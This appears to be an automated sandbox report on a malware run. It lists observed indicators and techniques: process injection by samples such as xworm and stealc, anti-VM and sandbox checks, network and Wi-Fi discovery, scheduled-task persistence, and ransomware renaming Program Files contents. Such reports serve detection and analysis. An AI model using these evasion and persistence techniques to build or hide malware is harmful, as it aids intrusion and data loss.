svchost.exe File opened for modification C:\Windows\SysWOW64\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\pdh.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shcore.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\9EF2303E8003087932C2558C33F25488A18418EC MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\3F11B04F09DEF4E5F3B31E6AB52B754D4C6A108C MeshAgent.exe File opened for modification C:\Windows\System32\zlib1.dll printui.exe File opened for modification C:\Windows\System32\libpq.dll printui.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\Tasks\Gxtuum svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\libssl-3-x64.dll printui.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4268 tasklist.exe 1536 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 1188 def.exe 40812 pered.exe 27732 random.exe 28376 axplong.exe 32288 8facf62118.exe 32868 axplong.exe 37360 fd45ee69c3.exe 37884 1b2e8379f6.exe -
Suspicious use of SetThreadContext 20 IoCs
description pid Process procid_target PID 1012 set thread context of 1972 1012 Mph.pif 133 PID 1760 set thread context of 3240 1760 legas.exe 138 PID 744 set thread context of 1244 744 xworm.exe 152 PID 2468 set thread context of 2576 2468 whiteheroin.exe 160 PID 2548 set thread context of 40648 2548 winn.exe 251 PID 9100 set thread context of 19236 9100 winupsecvmgr.exe 297 PID 9100 set thread context of 19164 9100 winupsecvmgr.exe 298 PID 17284 set thread context of 16768 17284 winupsecvmgr.exe 317 PID 15524 set thread context of 14884 15524 winupsecvmgr.exe 330 PID 11020 set thread context of 10980 11020 winupsecvmgr.exe 358 PID 3896 set thread context of 8768 3896 winupsecvmgr.exe 371 PID 24004 set thread context of 29232 24004 MK.exe 409 PID 29040 set thread context of 30268 29040 winupsecvmgr.exe 439 PID 38768 set thread context of 17520 38768 Armanivenntii_crypted_EASY.exe 607 PID 40068 set thread context of 2516 40068 h5a71wdy.exe 656 PID 41088 set thread context of 41228 41088 powershell.EXE 663 PID 6424 set thread context of 22900 6424 svhostc.exe 811 PID 29388 set thread context of 30508 29388 5hvzv2sl.exe 931 PID 17976 set thread context of 43632 17976 crypted.exe 1067 PID 41964 set thread context of 43612 41964 PIMER_~1.EXE 1068 -
resource yara_rule behavioral1/memory/17992-28541-0x000000006EF50000-0x000000006EF5A000-memory.dmp upx behavioral1/memory/17992-28566-0x000000006EF50000-0x000000006EF5A000-memory.dmp upx -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN rorukal.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\accessibility.properties CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPack2019Eula.txt.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\CardViewIcon.png.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\trdtv2r41.xsl CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl\UIAutomationTypes.resources.dll CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\Classic\Spider.Wide.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-hover.svg CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\ui-strings.js CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAMECONTROLPROXY.DLL.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Diagnostics.EventLog.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\Square44x44Logo.scale-200.png CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\System.Security.Cryptography.Pkcs.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\UIAutomationTypes.resources.dll CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\libpostproc_plugin.dll CoronaVirus.exe File opened for modification C:\Program Files (x86)\Windows Media Player\en-US\mpvis.dll.mui CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.IO.Packaging.dll CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\THMBNAIL.PNG.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml CoronaVirus.exe File created C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-convert-l1-1-0.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\ui-strings.js.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sv_get.svg.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Mozilla Firefox\locale.ini CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Exchange.scale-125.png CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\ui-strings.js.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ucrtbase.dll CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\ui-strings.js.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\WordNet_license.txt.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Text.Encoding.CodePages.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-black_scale-125.png CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ul-oob.xrm-ms.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\redact_poster.jpg CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ul-oob.xrm-ms.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\ui-strings.js.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSO.ACL.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.VisualStudio.OLE.Interop.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\PROOF\LTSHYPH_EN.LEX.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.IO.Compression.ZipFile.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer_eula.txt.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Drawing.Common.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\AccessMessageDismissal.txt.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Images\contrast-standard\theme-light\Settings.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.OData.Query.NetFX35.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\vcruntime140.dll CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr\UIAutomationProvider.resources.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_retina.png CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\ui-strings.js.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinStatusBar.v8.1.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.Royale.dll CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-32_altform-unplated.png CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\ui-strings.js.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Trial-ppd.xrm-ms.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ui-strings.js.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libshm_plugin.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\psmachine_64.dll CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs\System.Windows.Controls.Ribbon.resources.dll CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es\UIAutomationClient.resources.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageWideTile.scale-100_contrast-white.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\index.win32.stats.json.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de\System.Windows.Forms.resources.dll.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-200_altform-lightunplated.png CoronaVirus.exe -
Drops file in Windows directory 30 IoCs
description ioc Process File created C:\Windows\sysnldcvmr.exe 832027307.exe File opened for modification C:\Windows\svchost.com dxwebsetup.exe File opened for modification C:\Windows\assembly\Desktop.ini client.exe File opened for modification C:\Windows\Logs\DirectX.log dxwsetup.exe File created C:\Windows\sysklnorbcv.exe 1.exe File created C:\Windows\sysvplervcs.exe a.exe File opened for modification C:\Windows\Tasks\Gxtuum.job svchost.exe File opened for modification C:\Windows\sysklnorbcv.exe 1.exe File created C:\Windows\Tasks\axplong.job random.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\sysnldcvmr.exe 832027307.exe File opened for modification C:\Windows\Tasks\axplong.job svchost.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File created C:\Windows\sysvplervcs.exe a.exe File opened for modification C:\Windows\sysvplervcs.exe a.exe File created C:\Windows\assembly\Desktop.ini client.exe File created C:\Windows\Tasks\Gxtuum.job AllNew.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\assembly client.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com -
Launches sc.exe 26 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4376 sc.exe 38096 sc.exe 17536 sc.exe 38180 sc.exe 4248 sc.exe 2992 sc.exe 3760 sc.exe 4060 sc.exe 8232 sc.exe 30856 sc.exe 38272 sc.exe 40712 sc.exe 4800 sc.exe 1304 sc.exe 8312 sc.exe 31652 sc.exe 31680 sc.exe 38136 sc.exe 40700 sc.exe 39036 sc.exe 4628 sc.exe 60 sc.exe 2420 sc.exe 30672 sc.exe 38164 sc.exe 40584 sc.exe -
Detects Pyinstaller 3 IoCs
resource yara_rule behavioral1/files/0x000200000001f976-26943.dat pyinstaller behavioral1/files/0x0009000000023e7f-35974.dat pyinstaller behavioral1/files/0x0011000000023f0e-42387.dat pyinstaller -
Embeds OpenSSL 4 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x000300000000073b-18393.dat embeds_openssl behavioral1/files/0x0009000000023eb3-37305.dat embeds_openssl behavioral1/files/0x0009000000023eb1-37530.dat embeds_openssl behavioral1/files/0x000e000000023e95-39821.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 12 IoCs
pid pid_target Process procid_target 2412 1760 WerFault.exe 137 4372 744 WerFault.exe 150 18072 18312 WerFault.exe 685 12728 18312 WerFault.exe 685 30076 29388 WerFault.exe 916 33024 28224 WerFault.exe 396 17200 33420 WerFault.exe 507 11244 35808 WerFault.exe 984 21968 23628 WerFault.exe 1245 19016 28560 WerFault.exe 1334 11056 16336 Process not Found 1508 13684 15288 Process not Found 1588 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1473532575.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ha7dur10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmiintegrator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hbfgjhhesfd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language inst77player_1.0.0.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8facf62118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dxwebsetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmisecure.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stail.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3546345.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dxwebsetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whiteheroin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 104331525.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysklnorbcv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Photos.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmihostwin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 43412 Process not Found 24656 Process not Found 36428 Process not Found 14228 Process not Found -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4984 netsh.exe 5320 cmd.exe -
NSIS installer 4 IoCs
resource yara_rule behavioral1/files/0x000b000000021413-28517.dat nsis_installer_1 behavioral1/files/0x000b000000021413-28517.dat nsis_installer_2 behavioral1/files/0x0009000000023e54-32551.dat nsis_installer_1 behavioral1/files/0x0009000000023e54-32551.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe -
Checks processor information in registry 2 TTPs 23 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default2.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3546345.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3546345.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString S%D0%B5tu%D1%80111.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 S%D0%B5tu%D1%80111.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 channel.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString channel.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default2.exe -
Delays execution with timeout.exe 11 IoCs
pid Process 9528 timeout.exe 18740 timeout.exe 29704 timeout.exe 31884 timeout.exe 20776 Process not Found 1532 timeout.exe 40040 timeout.exe 40676 timeout.exe 7988 timeout.exe 31196 timeout.exe 31940 timeout.exe -
Discovers systems in the same network 1 TTPs 64 IoCs
pid Process 10048 net.exe 35124 net.exe 43828 net.exe 34440 Process not Found 13840 net.exe 13108 net.exe 39632 net.exe 23840 net.exe 8080 net.exe 5804 net.exe 25956 net.exe 19856 net.exe 24816 net.exe 26312 net.exe 42832 net.exe 10784 net.exe 19424 net.exe 32124 net.exe 2088 net.exe 30124 net.exe 23732 net.exe 17800 net.exe 2420 Process not Found 32088 Process not Found 25128 net.exe 38484 net.exe 12992 net.exe 4984 net.exe 12876 Process not Found 3356 Process not Found 11916 net.exe 21224 net.exe 32260 net.exe 23544 net.exe 28496 net.exe 7992 Process not Found 39716 Process not Found 34832 net.exe 35212 net.exe 12600 net.exe 28464 net.exe 3908 Process not Found 41144 net.exe 16236 net.exe 18600 net.exe 24928 net.exe 21080 Process not Found 7072 net.exe 41360 net.exe 17400 net.exe 8104 net.exe 30028 net.exe 28488 net.exe 38156 Process not Found 12932 Process not Found 20464 net.exe 29312 net.exe 16380 net.exe 18636 net.exe 2548 Process not Found 6980 net.exe 23136 net.exe 20556 net.exe 18044 net.exe -
